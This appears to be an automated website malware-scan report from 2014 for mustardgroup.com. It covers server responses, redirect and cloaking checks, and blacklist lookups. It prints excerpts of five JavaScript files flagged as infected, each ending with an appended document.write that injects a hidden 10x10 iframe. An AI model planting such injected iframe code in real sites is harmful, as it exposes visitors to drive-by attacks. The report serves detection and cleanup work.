Scanned pages/files
Request | Server response | Status |
http://mustardgroup.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Wed, 13 Aug 2014 01:18:24 GMT Pragma: no-cache Location: http://www.mustardgroup.com/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=0p6jscj803vluiu1pjrgrhb3r2; path=/ X-Pingback: http://www.mustardgroup.com/xmlrpc.php | clean |
http://www.mustardgroup.com/ | 200 OK Content-Length: 19400 Content-Type: text/html | clean |
http://www.mustardgroup.com/wp-content/themes/empire/js/jquery-1.7.min.js?ver=3.4 | 200 OK Content-Length: 94157 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a,b){function cA(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cx(a){if(!cm[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cn||(cn=c.createElement("iframe"),cn.frameBorder=cn.width=cn.height=0),b.appendChild(cn);if(!co||!cn.createElement)co=(cn.contentWindow||cn.contentDocument).document,co.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"")+"<html><body>"),co.close();d=c Antivirus reports:
| ||
http://www.mustardgroup.com/wp-content/themes/empire/js/jquery-ui.min.js?ver=3.4 | 200 OK Content-Length: 202012 Content-Type: text/javascript | clean |
http://www.mustardgroup.com/wp-content/themes/empire/js/preloader.js?ver=3.4 | 200 OK Content-Length: 2022 Content-Type: text/javascript | clean |
http://www.mustardgroup.com/wp-content/themes/empire/js/jquery.fancybox-1.3.4.js?ver=3.4 | 200 OK Content-Length: 29535 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($) { var tmp, loading, overlay, wrap, outer, content, close, title, nav_left, nav_right, selectedIndex = 0, selectedOpts = {}, selectedArray = [], currentIndex = 0, currentOpts = {}, currentArray = [], ajaxLoader = null, imgPreloader = new Image(), imgRegExp = /\.(jpg|gif|png|bmp|jpeg)(.*)?$/i, swfRegExp = /[^\.]\.(swf)\s*$/i, loadingTimer, loadingFrame = 1, titleHeight = 0, titleStr = '', start_pos, final_pos, busy enableKeyboardNav : true, onStart : function(){}, onCancel : function(){}, onComplete : function(){}, onCleanup : function(){}, onClosed : function(){}, onError : function(){} }; $(document).ready(function() { $.fancybox.init(); }); })(jQuery); document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>'); Antivirus reports:
| ||
http://www.mustardgroup.com/wp-content/themes/empire/js/jquery.twitter.js?ver=3.4 | 200 OK Content-Length: 3299 Content-Type: text/javascript | clean |
http://www.mustardgroup.com/wp-content/themes/empire/js/jquery.nivo.slider.js?ver=3.4 | 200 OK Content-Length: 25418 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { var NivoSlider = function(element, options){ var settings = $.extend({}, $.fn.nivoSlider.defaults, options); var vars = { currentSlide: 0, currentImage: '', totalSlides: 0, randAnim: '', running: false, paused: false, stop: false }; var slider = $(element); < captionOpacity: 0.8, prevText: 'Prev', nextText: 'Next', beforeChange: function(){}, afterChange: function(){}, slideshowEnd: function(){}, lastSlide: function(){}, afterLoad: function(){} }; $.fn._reverse = [].reverse; })(jQuery); document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>'); Antivirus reports:
| ||
http://www.mustardgroup.com/wp-content/themes/empire/js/jquery.bgslider.js?ver=3.4 | 200 OK Content-Length: 1911 Content-Type: text/javascript | clean |
http://www.mustardgroup.com/wp-content/themes/empire/js/jquery.quicksand.js?ver=3.4 | 200 OK Content-Length: 14834 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function ($) { $.fn.quicksand = function (collection, customOptions) { var options = { duration: 750, easing: 'swing', attribute: 'data-id', adjustHeight: 'auto', useScaling: true, enhancement: function(c) {}, selector: '> *', dx: 0, dy: 0 }; $.extend(options, customOptions); if ($.browser.msi $dest.remove(); options.enhancement($sourceParent); for (i = 0; i < animationQueue.length; i++) { animationQueue[i].element.animate(animationQueue[i].animation, options.duration, options.easing, postCallback); } }); }; })(jQuery); document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>'); Antivirus reports:
| ||
http://www.mustardgroup.com/wp-content/themes/empire/js/farbtastic.js?ver=3.4 | 200 OK Content-Length: 7825 Content-Type: text/javascript | clean |
http://mustardgroup.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 13 Aug 2014 01:18:34 GMT Pragma: no-cache Location: http://www.mustardgroup.com/test404page.js Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Wed, 13 Aug 2014 01:18:34 GMT Set-Cookie: PHPSESSID=463734en5t70ubhairhgiesuu5; path=/ X-Pingback: http://www.mustardgroup.com/xmlrpc.php | clean |
http://www.mustardgroup.com/test404page.js | 404 Not Found Content-Length: 17450 Content-Type: text/html | clean |
http://www.mustardgroup.com/about-us/ | 200 OK Content-Length: 19427 Content-Type: text/html | clean |
http://www.mustardgroup.com/wp-includes/js/comment-reply.js?ver=3.4 | 200 OK Content-Length: 923 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form-div"),o=n.I(n.respondId);if(!e||!o){return}n.I("comment_parent").value="0";e.parentNode.insertBefore(o,e);e.parentNode.removeChild(e);this.style.display="none";this.onclick=null;return false};try{m.I("comment").focus()}catch(g){}return false},I:function(a){return document.getElementById(a)}}; document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>'); Antivirus reports:
| ||
http://www.mustardgroup.com/management/ | 200 OK Content-Length: 20132 Content-Type: text/html | clean |
http://www.mustardgroup.com/mustard-group/ | 200 OK Content-Length: 17932 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mustardgroup.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 13 Aug 2014 01:18:24 GMT
Pragma: no-cache
Location: http://www.mustardgroup.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=0p6jscj803vluiu1pjrgrhb3r2; path=/
X-Pingback: http://www.mustardgroup.com/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: mustardgroup.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 13 Aug 2014 01:18:24 GMT
Pragma: no-cache
Location: http://www.mustardgroup.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=0p6jscj803vluiu1pjrgrhb3r2; path=/
X-Pingback: http://www.mustardgroup.com/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mustardgroup.com
Referer: http://www.google.com/search?q=mustardgroup.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mustardgroup.com
Referer: http://www.google.com/search?q=mustardgroup.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mustardgroup.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mustardgroup.com/
Result: mustardgroup.com is not infected or malware details are not published yet.
Result: mustardgroup.com is not infected or malware details are not published yet.